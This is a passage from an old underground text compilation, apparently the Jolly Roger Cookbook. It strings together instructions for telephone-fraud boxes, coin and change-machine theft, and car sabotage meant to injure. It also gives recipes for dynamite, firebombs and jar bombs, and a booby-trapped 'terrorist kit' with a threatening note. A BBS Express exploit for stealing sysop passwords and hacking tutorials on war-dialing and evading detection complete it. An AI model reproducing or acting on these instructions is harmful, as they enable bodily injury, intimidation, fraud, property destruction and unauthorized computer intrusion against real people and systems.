99XX OFFICIAL SERIES) AND MOVE DOWNWARD.SINCE THE LINE, NOT THE FONE, DETERMINES WHETHER OR NOT A DEPOSITMUST BE MADE, DTF & CHARGE-A-CALL FONES MAKE GREAT EXTENSIONS!FINALLY, FORTRESS FONES ALLOW FOR A NEW HOBBY--INSTRUCTION PLATECOLLECTING.ALL THAT IS REQUIRED IS A FLAT-HEAD SCREWDRIVER AND A PAIR OF NEEDLE-NOSEPLIERS. SIMPLY USE THE SCREWDRIVER TO LIFT UNDERNEATH THE PLATE SO THATYOUCAN GRAB IT WITH THE PLIERS AND YANK DOWNWARDS. I WOULD SUGGEST COVERINGTHETIPS OF THE PLIERS WITH ELECTRICAL TAPE TO PREVENT SCRATCHING. TEN CENTPLATESARE DEFINITELY BECOMING A "RARITY!"
FORTRESS SECURITY:------------------
WHILE A LONELY FORTRESS MAY SEEM THE PERFECT TARGET, BEWARE! THE GESTAPOHAS BEEN KNOWN TO STAKE OUT FORTRESSES FOR AS LONG AS 6 YEARS ACCORDING TOTHEGRASS ROOTS QUARTERLY. TO AVOID ANY PROBLEMS, DO NOT USE THE SAME FONESREPEATEDLY FOR BOXING, CALLING CARDS, & OTHER EXPERIMENTS. THE TELCO KNOWSHOWMUCH MONEY SHOULD BE IN THE COIN BOX AND WHEN ITS NOT THERE THEY TEND TOGETPERTURBED (READ: PISSED OFF).
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--------Jolly Roger
p.s. This was originally written back in my old Apple ][ days,hence the upper case. I just did not think I should waste thelittle time I have to work on this shit converting it to lower-case. Hell, I thought 80-columns was pretty nice of me.. heh heh.Well, enjoy this and the rest of this Cookbook! ---------JR
Black Box Plans by The Jolly Roger
Introduction:------------At any given time, the voltage running through your phone is about 20Volts. When someone calls you, this voltage goes up to 48 Volts and ringsthe bell. When you answer, the voltage goes down to about 10 Volts.The phone company pays attention to this. When the voltage drops to 10,they start billing the person who called you.
Function:--------The Black Box keeps the voltage going through your phone at 36 Volts,so that it never reaches 10 Volts. The phone company is thus fooledinto thinking you never answered the phone and does not bill the caller.However, after about a half hour the phone company will get suspiciousand disconnect your line for about 10 seconds.
Materials:---------
1 1.8K 1/2 Watt Resistor1 1.5V LED1 SPST Switch
Procedure:---------(1) Open your phone by loosening the two screws on the bottom andlifting the case off.(2) There should be three wires: Red, Green, and Yellow. We'll be workingwith the Red Wire.(3) Connect the following in parallel: A. The Resistor and LED. B. The SPST Switch.In other words, you should end up with this: (Red Wire) !---/\/\/\--O--!(Line)-----! !-----(Phone) !-----_/_------! /\/\/\ = Resistor O = LED _/_ = SPST
Use:---The SPST Switch is the On/Off Switch of the Black Box. When the box is off,your phone behaves normally. When the box is on and your phone rings,the LED flashes. When you answer, the LED stays on and the voltageis kept at 36V, so the calling party doesn't get charged. When the boxis on, you will not get a dial tone and thus cannot make calls.Also remember that calls are limited to half an hour.
------------Jolly Roger
p.s. Due to new Fone Company switching systems & the like, thismay or may not work in your area. If you live in bumfuck Kentucky,then try this out. I make no guarantees! (I never do...) ----JR
The Infamous Blotto Box!! by The Jolly Roger
(I bet that NOONE has the balls to build this one!)
Finally, it is here! What was first conceived as a joke to fool theinnocentphreakers around America has finally been conceived!Well, for you people who are unenlightened about the Blotto Box,here is a brief summery of a legend.
--*-=> The Blotto Box <=-*--
For years now every pirate has dreamed of the Blotto Box. It was at firstmade as a joke to mock more ignorant people into thinking thatthe function of it actually was possible. Well, if you are The VoltageMaster, it is possible. Originally conceived by King Blotto of much fame,the Blotto Box is finally available to the public.NOTE: Jolly Roger can not be responsible for the information disclosedin the file! This file is strictly for informational purposes andshould not be actually built and used! Usage of this electronical impulsemachine could have the severe results listed below and could result in
high federal prosecution! Again, I TAKE NO RESPONSIBILITY!All right, now that that is cleared up, here is the basis of the boxand it's function.The Blotto Box is every phreaks dream... you could hold AT&T down on itsknee's with this device. Because, quite simply, it can turn off the phonelines everywhere. Nothing. Blotto. No calls will be allowed out of an areacode, and no calls will be allowed in. No calls can be made inside it forthat matter. As long as the switching system stays the same, this box willnot stop at a mere area code. It will stop at nothing. The electricalimpulses that emit from this box will open every line. Every line willring and ring and ring... the voltage will never be cut off until thebox/generator is stopped. This is no 200 volt job, here.We are talking GENERATOR. Every phone line will continue to ring, andpeopleclose to the box may be electricuted if they pick up the phone.But, the Blotto Box can be stopped by merely cutting of the line orgenerator.If they are cut off then nothing will emit any longer. It will takea while for the box to calm back down again, but that is merely asuperficial aftereffect. Once again: Construction and use of this box isnot advised! The Blotto Box will continue as long as there iselectricity to continue with.OK, that is what it does, now, here are some interesting things for youto do with it...
-*-=>Blotto Functions/Installin'<=-*-
Once you have installed your Blotto, there is no turning back. Thefollowing are the instructions for construction and use of this box.Please read and heed all warnings in the above section before you attemptto construct this box.
Materials: - A Honda portable generator or a main power outlet like in a stadium or some such place. - 400 volt rated coupler that splices a female plug into a phone line jack. - A meter of voltage to attach to the box itself. - A green base (i.e. one of the nice boxes about 3' by 4' that you see around in your neighborhood. They are the main switch boards and would be a more effective line to start with. or: A regular phone jack (not your own, and not in your area code! - A soldering iron and much solder. - A remote control or long wooden pole.Now. You must have guessed the construction from that. If not, here goes,I will explain in detail. Take the Honda Portable Generator and all ofthe other listed equiptment and go out and hunt for a green base. Makesure it is one on the ground or hanging at head level from a pole,not the huge ones at the top of telephone poles. Open it up with anythingconvienent, if you are two feeble that fuck don't try this.Take a look inside... you are hunting for color-coordinating lines ofgreen and red. Now, take out your radio shack cord and rip the meter thingoff. Replace it with the voltage meter about. A good level to set thevoltage to is about 1000 volts. Now, attach the voltage meter to the cordand set the limit for one thousand. Plug the other end of the cordinto the generator. Take the phone jack and splice the jack part off.Open it up and match the red and green wires with
the other red and green wires. NOTE: If you just had the generator onand have done this in the correct order, you will be a crispy critter.Keep the generator off until you plan to start it up. Now, solder thoselines together carefully. Wrap duck tape or insultation tape around allof the wires. Now, place the remote control right on to the startupof the generator. If you have the long pole, make sure it is very longand stand back as far away as you can get and reach the pole over.NOTICE: If you are going right along with this without reading the filefirst, you still realize now that your area code is about to becomenull! Then, getting back, twitch the pole/remote control and run for yourdamn life. Anywhere, just get away from it. It will be generatingso much electricity that if you stand to close you will kill yourself.The generator will smoke, etc. but will not stop. You are now killing yourarea code, because all of that energy is spreading through all of thephone lines around you in every direction.
Have a nice day!
--*-=>The Blotto Box: Aftermath<=-*--Well, that is the plans for the most devastating and ultimately deadlybox ever created. My hat goes off to: King Blotto (for the original idea).
---------Jolly Roger
Blowgun by The Jolly Roger
In this article I shall attempt to explain the use and manufactureof a powerfull blow-gun and making darts for the gun.The possesion ofthe blow gun described in this article IS a felony.So be carefull where you use it. I don't want to get you all busted.
Needed:
1. Several strands of yarn (About 2 inches a-piece)2. A regular pencil3. A 2 1/4 inch long needle (hopefully with a beaded head. If not obtainable,wrap tape around end of needle.4. 2-3 1/4 foot pipe. (PVC or Aluminum) Half a inch in diameter
Constructing the dart:
1st- Carefully twist and pull the metal part (Along with eraser)of the pencil till it comes off.2nd- Take Pin and start putting about 5-7 Strands of yarn on the pin. Thenpush them up to the top of the pin. But not over the head of the pin (orthetape).3rd- Push pin through the hollow part of the head where the pencil wasbefore.4th- That should for a nice looking dart. (see illustration)
#####>>>>>-----/ # is the yarn > is the head of the pencil - is the pin it-self / is the head of the pin
Using the Darts:

1st- Now take the finished dart and insert it in the tube(if it is too small put on more yarn.)2nd- Aim the tube at a door, wall, sister, ect.3rd- blow on the end of the pipe.4th- Sometimes the end of the pipe may be sharp. When this happens Isuggest you wrap it with some black electrician tape.It should feela lot better. -------Jolly Roger
Brown Box Plans by The Jolly Roger
This is a fairly simple mod that can be made to any phone. All it doesis allow you to take any two lines in your house and create a partyline. So far I have not heard of anyone who has any problemswith it. There is one thing that you will notice when you areone of the two people who is called by a person with a brown box. The otherperson will sound a little bit faint. I could overcome this with someamplifiers but then there wouldn't be very many of these made [Why not?].I think the convenience of having two people on the line at once willmake up for any minor volume loss.
Here is the diagram:---------------------------------------KEY:___________________________________ PART SYMBOL --------------------------------- BLACK WIRE * YELLOW WIRE = RED WIRE + GREEN WIRE - SPDT SWITCH _/_ _/_ VERTICAL WIRE HORIZONTAL WIRE _ ----------------------------------- * = - + * = - + * = - + * = - + * = - + * ==_/_- + *******_/_++++++ _____PHONE____
------------Jolly Roger
Calcium Carbide Bomb by The Jolly Roger
This is EXTREMELY DANGEROUS. Exercise extreme caution.... Obtain somecalcium carbide. This is the stuff that is used in carbide lamps andcan be found at nearly any hardware store. Take a few pieces of this
stuff (it looks like gravel) and put it in a glass jar with somewater. Put a lid on tightly. The carbide will react with the water toproduce acetylene carbonate which is similar to the gas used incutting torches. Eventually the glass with explode from internalpressure. If you leave a burning rag nearby, you will get a nicefireball! -----------Jolly Roger
More Ways to Send a Car to Hell by The Jolly Roger
Due to a lot of compliments, I have written an update to file #14.I have left the original intact. This expands upon the originalidea, and could be well called a sequal. -----JR
How to have phun with someone else's car. If you really detestsomeone, and I mean detest, here's a few tips on what to do in yourspare time. Move the windshield wiper blades, and insert and gluetacks. The tacks make lovely designs. If your "friend" goes toschool with you, Just before he comes out of school. Light a lighterand then put it directly underneath his car door handle.Wait...Leave...Listen. When you hear a loud "shit!", you know hemade it to his car in time. Remove his muffler and pour approximately1 Cup of gas in it. Put the muffler back, then wait till their car starts.Then you have a cigarette lighter. A 30 foot long cigarette lighter.This one is effective, and any fool can do it. Remove the topair filter. That's it! Or a oldie but goodie: sugar in the gas tank.Stuff rags soaked in gas up the exhaust pipe. Then you wonder whyyour "friend" has trouble with his/her lungs. Here's one that takestime and many friends. Take his/her car then break into their houseand reassemble it, in their living or bedroom. Phun eh? If you'reinto engines, say eeni mine moe and point to something and remove it.They wonder why something doesn't work. There are so many others, butthe real good juicy ones come by thinking hard.
-----------Jolly Roger
Ripping off Change Machines by the Jolly Roger
Have you ever seen one of those really big changer machines in airportslaundrymats or arcades that dispense change when you put in your 1 or 5dollar bill? Well then, here is an article for you.
1) Find the type of change machine that you slide in your bill lengthwise, not the type where you put the bill in a tray and then slide thetray in!!!2) After finding the right machine, get a $1 or $5 bill. Start crumplingup into a ball. Then smooth out the bill, now it should have a verywrinklysurface.3) Now the hard part. You must tear a notch in the bill on theleft side about 1/2 inch below the little 1 dollar symbol (See Figure).4) If you have done all of this right then take the bill and go out themachine. Put the bill in the machine and wait. What should happen is:when you put your bill in the machine it thinks everything is fine.When it gets to the part of the bill with the notch cut out, themachine will reject the bill and (if you have done it right)give you the change at the same time!!! So, you end up getting your billback, plus the change!! It might take a little practice, but once
you get the hang of it, you can get a lot of money! !--------------------------------! ! ! ! (1) /-------\ (1) ! ! ! ! ! ! ! Pic. ! ! ! (1) /\ \-------/ (1) ! ! !! ! !-----/ \-----------------------! \-------Make notch here. About 1/2 " down from(1)
P.S. Sorry for the "text work" but you should be able to get theidea. Have fun!!! -----------------------Jolly Roger
Clear Box Plans by The Jolly Roger
The clear box is a new device which has just been invented that can beused throughout Canada and rural United States. The clear box works on"PostPay" payphones (fortress fones). Those are the payphonesthat don't require payment until after the connection is established.You pick up the fone, get a dial tone, dial your number, and theninsert your money after the person answers.If you don't deposit the money then you can not speak to the person onthe other end because your mouth piece is cut off but not the ear-piece.(obviously these phones are nice for free calls to weather or time orother such recordings). All you must do is to go to your nearby RadioShack, or electronics store, and get a four-transistor amplifier and atelephone suction cup induction pick-up. The induction pick-up would behooked up as it normally would to record a conversation, exceptthat it would be plugged into the output of the amplifier and amicrophone would be hooked to the input. So when the partythat is being called answers, the caller could speak through the littlemicrophone instead. His voice then goes through the amplifier and outthe induction coil, and into the back of the receiver whereit would then be broadcast through the phone lines and the otherpartywould be able to hear the caller. The Clear Box thus'clears up' the problem of not being heard. Luckily, the line willnot be cut-off after a certain amount of time because it will waitforever for the coins to be put in.The biggest advantage for all of us about this new clear box is thefact that this type of payphone will most likely become very common.Due to a few things: 1st, it is a cheap way of getting the DTF,dial-tone-first service, 2nd, it doesn't require any special equipment,(for the phone company) This payphone will work on any phone line.Usually a payphone line is different, but this is a regular phone lineand it is set up so the phone does all the charging, not the company.
------------Jolly Roger
CNA List Courtesy of The Jolly Roger
NPA TEL NO NPA TEL NO--------------------------------------201 201-676-7070 601 601-961-8139202 304-343-7016 602 303-293-8777203 203-789-6815 603 617-787-5300
204 204-949-0900 604 604-432-2996205 205-988-7000 605 402-580-2255206 206-382-5124 606 502-583-2861207 617-787-5300 607 518-471-8111208 303-293-8777 608 608-252-6932209 415-543-2861 609 201-676-7070212 518-471-8111 612 402-580-2255213 415-781-5271 613 416-443-0542214 214-464-7400 614 614-464-0123215 412-633-5600 615 615-373-5791216 614-464-0123 616 313-223-8690217 217-525-5800 617 617-787-5300218 402-580-2255 618 217-525-5800219 317-265-4834 619 818-501-7251301 304-343-1401 701 402-580-2255302 412-633-5600 702 415-543-2861303 303-293-8777 703 304-344-7935304 304-344-8041 704 912-784-0440305 912-784-0440 705 416-979-3469306 306-347-2878 706 *** NONE ***307 303-293-8777 707 415-543-6374308 402-580-2255 709 *** NONE ***309 217-525-5800 712 402-580-2255312 312-796-9600 713 713-861-7194313 313-223-8690 714 818-501-7251314 314-721-6626 715 608-252-6932315 518-471-8111 716 518-471-8111316 816-275-2782 717 412-633-5600317 317-265-4834 718 518-471-8111318 504-245-5330 801 303-293-8777319 402-580-2255 802 617-787-5300401 617-787-5300 803 912-784-0440402 402-580-2255 804 304-344-7935403 403-425-2652 805 415-543-2861404 912-784-0440 806 512-828-2501405 405-236-6121 807 416-443-0542406 303-293-8777 808 212-334-4336408 415-543-6374 809 212-334-4336409 713-861-7194 812 317-265-4834412 413-633-5600 813 813-228-7871413 617-787-5300 814 412-633-5600414 608-252-6932 815 217-525-5800415 415-543-6374 816 816-275-2782416 416-443-0542 817 214-464-7400417 314-721-6626 818 415-781-5271418 514-725-2491 819 514-725-2491419 614-464-0123 901 615-373-5791501 405-236-6121 902 902-421-4110502 502-583-2861 904 912-784-0440503 206-382-5124 906 313-223-8690504 504-245-5330 907 *** NONE ***505 303-293-8777 912 912-784-0440506 506-648-3041 913 816-275-2782507 402-580-2255 914 518-471-8111509 206-382-5124 915 512-828-2501512 512-828-2501 916 415-543-2861513 614-464-0123 918 405-236-6121514 514-725-2491 919 912-784-0440
515 402-580-2255 516 518-471-8111517 313-223-8690 518 518-471-8111519 416-443-0542 900 201-676-7070
Electronic Terrorism by The Jolly Roger
It starts when a big, dumb lummox rudely insults you. Being of arational, intelligent disposition, you wisely choose to avoid a(direct) confrontation. But as he laughs in your face, you smileinwardly---your revenge is already planned.Step 1: follow your victim to his locker, car, or house. Once youhave chosen your target site, lay low for a week or more,letting your anger boil.Step 2: in the mean time, assemble your versatile terroristkit(details below.)Step 3: plant your kit at the designated target site on a mondaymorning between the hours of 4:00 am and 6:00 am. Include acalm, suggestive note that quietly hints at the possibilityof another attack. Do not write it by hand! An example ofan effective note: "don't be such a jerk, or the next one will take off your hand. Have a nice day."Notice how the calm tone instills fear. As if written by ahomicidal psychopath.Step 5: choose a strategic location overlooking the target site. Tryto position yourself in such a way that you can see his facial contortions.Step 6: sit back and enjoy the fireworks! Assembly of the versatile,economic, and effective terrorist kit #1: the parts you'll need are:1) 4 aa batteries2) 1 9-volt battery3) 1 spdt mini relay (radio shack)4) 1 rocket engine(smoke bomb or m-80)5) 1 solar ignitor (any hobby store)6) 1 9-volt battery connector
Step 1: take the 9-volt battery and wire it through the relay's coil.This circuit should also include a pair of contacts that whenseparated cut off this circuit. These contacts should be held togetherby trapping them between the locker,mailbox, or car door.Once the door is opened, the contacts fall apart and the 9-volt circuitis broken, allowing the relay to fall to the closed postionthus closing the ignition circuit. (If all this is confusing take alook at the schematic below.)
Step 2: take the 4 aa batteries and wire them in succession.Wire the positive terminal of one to the negative terminal of another,until all four are connected except one positive terminal and one negativeterminal. Even though the four aa batteries only combine to create 6volts, the increase in amperage is necessary to activate the solarignitor quickly and effectively.
Step 3: take the battery pack (made in step 2) and wire one end of itto the relay's single pole and the other end to one prong of the solarignitor. Then wire the other prong of the solar ignitor back to the openposition on the relay.
Step 4: using double sided carpet tape mount the kit in his locker,
mailbox, or car door. And last, insert the solar ignitor into therocket engine (smoke bomb or m-80).

Your kit is now complete!
---------><--------- I (CONTACTS) I I I I - (BATTERY) I --- I I I (COIL) I ------///////------- /----------- / I / I / I (SWITCH) I I I I I --- (BATTERY) I - ( PACK ) I --- I I I I ---- ----- I I * (SOLAR IGNITOR)
---------Jolly Roger
How to Start A Conference w/o 2600hz or M-F by The Jolly Roger
(Originally an Apple ][ file, forgive the upper case!)
THIS METHOD OF STARTING THE CONF. DEPENDS ON YOUR ABILITY TO BULLSHIT THEOPERATOR INTO DIALING A NUMBER WHICH CAN ONLY BE REACHED WITH AN OPERATOR'SM-F TONES. WHEN BULLSHITTING THE OPERATOR REMEMBER OPERATOR'S ARE NOTHIRED TO THINK BUT TO DO.
HERE IS A STEP-BY-STEP WAY TO THE CONF.:1. CALL THE OPERATOR THROUGH A PBX OR EXTENDER, YOU COULD JUST CALL ONETHROUGH YOUR LINE BUT I WOULDN'T RECOMMEND IT.2. SAY TO THE OPERATOR:TSPS MAINTENENCE ENGINEER, RING-FORWARD TO 213+080+1100, POSITION RELEASE,THANKYOU.(SHE WILL PROBABLY ASK YOU FOR THE NUMBER AGAIN)
DEFINITIONS: RING-FORWARD - INSTRUCTS HER TO DIAL THE NUMBER.POSITION RELEASE - INSTUCTS HER TO RELEASE THE TRUNK AFTER SHE HASDIALED THE NUMBER.+ - REMBER TO SAY 213PLUS080 PLUS1100.3. WHEN YOU ARE CONNECTED WITH THE CONF. YOU WILL HERE A WHISTLE BLOWTWICE AND A RECORDING ASKING YOU FOR YOUR OPERATOR #. DIAL IN ANY FIVEDIGITS AND HIT THE POUNDS SIGN A COUPLE OF TIMES. SIMPLY DIAL IN THE #OF THE BILLING LINE ECT. WHEN THE RECORDING ASK FOR IT.
3. WHEN IN THE CONTROL MODE OF THE CONF. HIT '6' TO TRANSFER CONTROL.HIT '001' TO REENTER THE # OF CONFEREE'S AND TIME AMOUNT WHICH YOUGAVE WHEN YOU STARED THE CONF. REMEMBER THE SIZE CAN BE FROM2-59 CONFEREE'S. I HAVE NOT FOUND OUT THE 'LENGTHS' LIMITS.

How to Make Dynamite by The Jolly Roger
Dynamite is nothing more than just nitroglycerin and a stablizingagent to make it much safer to use. For the sake of saving time, Iwill abbreviate nitroglycerin with a plain NG. The numbersare percentages, be sure to mix these carefully and be sure to use theexact amounts. These percentages are in weight ratio, not volume.
no. ingredients amount---------------------------------------#1 NG 32 sodium nitrate 28 woodmeal 10 ammonium oxalate 29 guncotten 1#2 NG 24 potassium nitrate 9 sodium nitate 56 woodmeal 9 ammonium oxalate 2#3 NG 35.5 potassium nitrate 44.5 woodmeal 6 guncotton 2.5 vaseline 5.5 powdered charcoal 6#4 NG 25 potassium nitrate 26 woodmeal 34 barium nitrate 5 starch 10#5 NG 57 potassium nitrate 19 woodmeal 9 ammonium oxalate 12 guncotton 3#6 NG 18 sodium nitrate 70 woodmeal 5.5 potassium chloride 4.5 chalk 2#7 NG 26 woodmeal 40 barium nitrate 32 sodium carbonate 2#8 NG 44 woodmeal 12 anhydrous sodium sulfate 44#9 NG 24 potassium nitrate 32.5 woodmeal 33.5
ammonium oxalate 10#10 NG 26 potassium nitrate 33 woodmeal 41#11 NG 15 sodium nitrate 62.9 woodmeal 21.2 sodium carbonate .9#12 NG 35 sodium nitrate 27 woodmeal 10 ammonium oxalate 1#13 NG 32 potassium nitrate 27 woodmeal 10 ammonium oxalate 30 guncotton 1#14 NG 33 woodmeal 10.3 ammonium oxalate 29 guncotton .7 potassium perchloride 27#15 NG 40 sodium nitrate 45 woodmeal 15#16 NG 47 starch 50 guncotton 3#17 NG 30 sodium nitrate 22.3 woodmeal 40.5 potassium chloride 7.2#18 NG 50 sodium nitrate 32.6 woodmeal 17 ammonium oxalate .4#19 NG 23 potassium nitrate 27.5 woodmeal 37 ammonium oxalate 8 barium nitrate 4 calcium carbonate .5
Household equivalants for chemicles
It has come to my attention that many of these chemicles aresold under brand names, or have household equivalants. here is a listthat might help you out. Also, see elsewhere in this Cookbook fora more complete listing............
acetic acid vinegaraluminum oxide alumiaaluminum potassium sulfate alumaluminum sulfate alumammonium hydroxide ammoniacarbon carbonate chalkcalcium hypochloride bleaching powdercalcium oxide lime
calcium sulfate plaster of pariscarbonic acid seltzercarbon tetrachloride cleaning fluidethylene dichloride Dutch fluidferric oxide iron rustglucose corn syrupgraphite pencil leadhydrochloric acid muriatic acidhydrogen peroxide peroxidelead acetate sugar of leadlead tetrooxide red leadmagnesium silicate talcmagnesium sulfate Epsom saltsnaphthalene mothballsphenol carbolic acidpotassium bicarbonate cream of tartarpotassium chromium sulf. chrome alumpotassium nitrate saltpetersodium dioxide sandsodium bicarbonate baking sodasodium borate boraxsodium carbonate washing sodasodium chloride saltsodium hydroxide lyesodium silicate water glasssodium sulfate glauber's saltsodium thiosulfate photographer's hyposulferic acid battery acidsucrose cane sugarzinc chloride tinner's fluid
Keep this list handy at all times. If you can't seem to get oneor more of the ingredients try another one. If you still can't, youcan always buy small amounts from your school, or maybe from variouschemical companies. When you do that, be sure to say as little aspossible, if during the school year, and they ask, say it's for aexperiment for school. -------------Jolly Roger
Auto Exhaust Flame Thrower by The Jolly Roger
For this one, all you need is a car, a sparkplug, ignition wire and aswitch. Install the spark plug into the last four or five inches ofthe tailpipeby drilling a hole that the plug can screw into easily.Attach the wire (this is regular insulated wire) to one side of theswitch and to the spark plug. The other side of the switch is attachedto the positive terminal on the battery. With the car running, simplyhit the switch and watch the flames fly!!! Again be careful that noone is behind you! I have seen some of these flames go 20 feet!!!
-------------Jolly Roger
Breaking into BBS Express Courtesy of the Jolly Roger
If you have high enough access on any BBS Express BBS you can get theSysop's password without any problems and be able to log on as him and dowhatever you like. Download the Pass file, delete the whole BBS, anything.Its all a matter of uploading a text file and d/ling it from the BBS. You
must have high enough access to see new uploads to do this. If you can seea file you just uploaded you have the ability to break into the BBS in afew easy steps.Why am I telling everyone this when I run BBS Express myself?Well there is one way to stop this from happening and I want other Sysopsto be aware of it and not have it happen to them.Breaking in is all based on the MENU function of BBS Express. Expresswill let you create a menu to display different text files by putting theword MENU at the top of any text file and stating what files are to bedisplayed. But due to a major screw up by Mr. Ledbetter you can use thisMENU option to display the USERLOG and the Sysop's Passwords or anythingelse you like. I will show you how to get the Sysop's pass and thereforelog on as the Sysop. BBs Express Sysop's have 2 passwords. One likeeveryone else gets in the form of X1XXX, and a Secondary passwordto make it harder to hack out the Sysops pass.The Secondary pass is found in a file called SYSDATA.DAT.This file must be on drive 1 and is therefore easy to get. All you have todo is upload this simple Text file:
MENU1D1:SYSDATA.DAT
Ripoff time!
after you upload this file you d/l it non-Xmodem. Stupid Express thinksit is displaying a menu and you will see this:
Ripoff time!
Selection [0]:
Just hit 1 and Express will display the SYSDATA.DAT file.OPPASS is wherethe Sysop's Secondary pass will be. D1:USERLOG.DAT is where you will findthe name and Drive number of the USERLOG.DAT file. The Sysop might haverenamed this file or put it in a Subdirectory or even on a differentdrive. I Will Assume he left it as D1:USERLOG.DAT. The other parts of thisfile tell you where the .HLP screens are and where the LOG is saved andall the Download path names.
Now to get the Sysop's primary pass you upload a text file like this:
MENU1D1:USERLOG.DAT
Breaking into Bedwetter's BBS
Again you then d/l this file non-Xmodem and you will see:
Breaking into Bedwetter's BBS
Selection [0]:
You then hit 1 and the long USERLOG.DAT file comes flying at you.The Sysop is the first entry in this very long file so it is easy. You willsee:
SYSOP'S NAME X1XXXYou should now have his 2 passwords.
There is only one easy way out of this that I can think of, and that isto make all new uploads go to SYSOP level (Level 9) access only. This waynobody can pull off what I just explained.I feel this is a major Bug on Mr. Ledbetter's part. I just don't know whyno one had thought of it before. I would like to give credit toRedline for the message he left on Modem Hell telling about this problem,and also to Unka for his ideas and input about correcting it.
This has been brought to you from [_The_Piper_] and the S.O.D. BBSNetwork!Firebombs by the Jolly Roger
Most fire bombs are simply gasoline filled bottles with a fuelsoaked rag in the mouth (the bottle's mouth, not yours). The originalMolotov cocktail, and still about the best, was a mixture of one partgasoline and one part motor oil. The oil helps it to cling to what itsplatters on.Some use one part roofing tar and one part gasoline. Fire bombshave been found which were made by pouring melted wax into gasoline.
-------------Jolly Roger
Fuse Ignition Bomb by The Jolly Roger
A four strand homemade fuse is used for this. It burns like fury.It is held down and concealed by a strip of bent tin cut from a can.The exposed end of the fuse is dipped into the flare igniter. To usethis one, you light the fuse and hold the fire bomb until the fuse hasburned out of sight under the tin. Then throw it and when it breaks,the burning fuse will ignite the contents.
-------------Jolly Roger
Generic Bomb by the Jolly Roger
1) Aquire a glass container2) Put in a few drops of gasoline3) Cap the top4) Now turn the container around to coat the inner surfaces and thenevaporates5) Add a few drops of potassium permanganate (<-Get this stuff from asnake bite kit)6) The bomb is detonated by throwing aganist a solid object.*AFTER THROWING THIS THING RUN LIKE HELL THIS THING PACKS ABOUT 1/2STICK OF DYNAMITE*
---------------Jolly Roger
Green Box Plans by the Jolly Roger
Paying the initial rate in order to use a red box (on certainfortresses) left a sour taste in many red boxers mouths, thus thegreen box was invented. The green box generates useful tones such asCOIN COLLECT, COIN RETURN, AND RINGBACK. These are the tones thatACTS or the TSPS operator would send to the CO when appropriate.
Unfortunately, the green box cannot be used at the fortress station butmust be used by the CALLED party.
Here are the tones:COIN COLLECT 700+1100hzCOIN RETURN 1100+1700hzRINGBACK 700+1700hz
Before the called party sends any of these tones, an operator realeasesignal should be sent to alert the MF detectors at the CO.This can be done by sending 900hz + 1500hz or a single 2600 wink (90 ms.)Also do not forget that the initial rate is collected shortly before the3 minute period is up. Incidentally, once the above MFtones for collecting and returning coins reach the CO, they areconverted into an appropriate DC pulse (-130 volts for return and+130 for collect). This pulse is then sent down the tip to thefortress. This causes the coin relay to either return or collect the coins.The alledged "T-network" takes advantage of this information.When a pulse for coin collect (+130 VDC) is sent down the line,it must be grounded somewhere. This is usually the yellow or black wire.Thus, if the wires are exposed, these wires can be cut to preventthe pulse from being grounded. When the three minute initialperiod is almost up, make sure that the black and yellow wires aresevered, then hang up, wait about 15 seconds in case of a secondpulse, reconnect the wires, pick up the phone, and if all goes well,it should be "JACKPOT" time. ---------Jolly Roger
Portable Grenade Launcher by the Jolly Roger
If you have a bow, this one is for you. Remove the ferrule from analuminum arrow, and fill the arrow with black powder (I use gradeFFFF, it burns easy)and then glue a shotshell primer into the holeleft where the ferrule went. Next, glue a BB on the primer, and youare ready to go! Make sure no one is nearby.... Little shreds ofaluminum go all over the place!! ------------Jolly Roger
Hacking Tutorial Courtesy of the Jolly Roger
What is hacking?----------------According to popular belief the term hacker and hacking was founded at mitit comes from the root of a hack writer,someone who keeps "hacking" atthe typewriter until he finishes the story.a computer hacker would behacking at the keyboard or password works.
What you need:--------------To hack you need a computer equipped with a modem (a device that lets youtransmit data over phone lines) which should cost you from $100 to $1200.
How do you hack?----------------Hacking recuires two things:1. The phone number2. Answer to identity elements
‡How do you find the phone #?----------------------------There are three basic ways to find a computers phone number.1. Scanning,2. Directory3. Inside info.
What is scanning?-----------------Scanning is the process of having a computer search for a carrier tone.For example,the computer would start at (800) 111-1111 and wait for carrierif there is none it will go on to 111-1112 etc.if there is a carrier itwill record it for future use and continue looking for more.
What is directory assictance?-----------------------------This way can only be used if you know where your target computer is. Forthisexample say it is in menlo park, CA and the company name is sri.
1. Dial 411 (or 415-555-1212)2. Say "Menlo park"3. Say "Sri"4. Write down number5. Ask if there are any more numbers6. If so write them down.7. Hang up on operator8. Dial all numbers you were given9. Listen fir carrier tone10. If you hear carrier tone write down number, call it on your modem andyour set to hack! ---------------Jolly Roger
The Basics of Hacking II Courtesy of the Jolly Roger
Basics to know before doing anything, essential to your continuingcareer as one of the elite in the country... This article, "theintroduction to the world of hacking" is meant to help you by telling youhow not to get caught, what not to do on a computer system, what type ofequipment should I know about now, and just a little on the history, pastpresent future, of the hacker.
Welcome to the world of hacking! We, the people who live outside of thenormal rules, and have been scorned and even arrested by those from the'civilized world', are becomming scarcer every day. This is due to thegreater fear of what a good hacker (skill wise, no moral judgementshere)can do nowadays, thus causing anti- hacker sentiment in the masses.Also, few hackers seem to actually know about the computer systems theyhack, or what equipment they will run into on the front end, or what theycould do wrong on a system to alert the 'higher' authorities who monitorthe system. This article is intended to tell you about some things not todo, even before you get on the system. I will tell you about the new waveof front end security devices that are beginning to be used on computers.I will attempt to instill in you a second identity, to be brought up attime of great need, to pull you out of trouble. And, by the way, I take no,repeat,no, responcibility for what we say in this and the forthcoming articles.
Enough of the bullshit, on to the fun: after logging on your favorite bbs,you see on the high access board a phone number! It says it's a greatsystem to "fuck around with!" This may be true, but how many other peopleare going to call the same number? So: try to avoid calling a numbergiven to the public. This is because there are at least every otheruser calling, and how many other boards will that number spread to?If you call a number far, far away, and you plan on going thru anextender or a re-seller, don't keep calling the same access number(I.E. As you would if you had a hacker running), this looks very suspiciousand can make life miserable when the phone bill comes in the mail.Most cities have a variety of access numbers and services,so use as many as you can. Never trust a change in the system...The 414's, the assholes, were caught for this reason: when one of themconnected to the system, there was nothing good there. The next time,there was a trek game stuck right in their way! They proceded to play saidgame for two, say two and a half hours, while telenet was tracing them!Nice job, don't you think? If anything looks suspicious, drop the lineimmediately!! As in, yesterday!! The point we're trying to get accross is:if you use a little common sence, you won't get busted. Let the littlekids who aren't smart enough to recognize a trap get busted, it will takethe heat off of the real hackers. Now, let's say you get on a computersystem... It looks great, checks out, everything seems fine.Ok, now is when it gets more dangerous. You have to know the computersystem to know what not to do.Basically, keep away from any command something, copy a new file into theaccount, or whatever! Always leave the account in the same status youlogged in with. Change *nothing*... If it isn't an account with priv's,then don't try 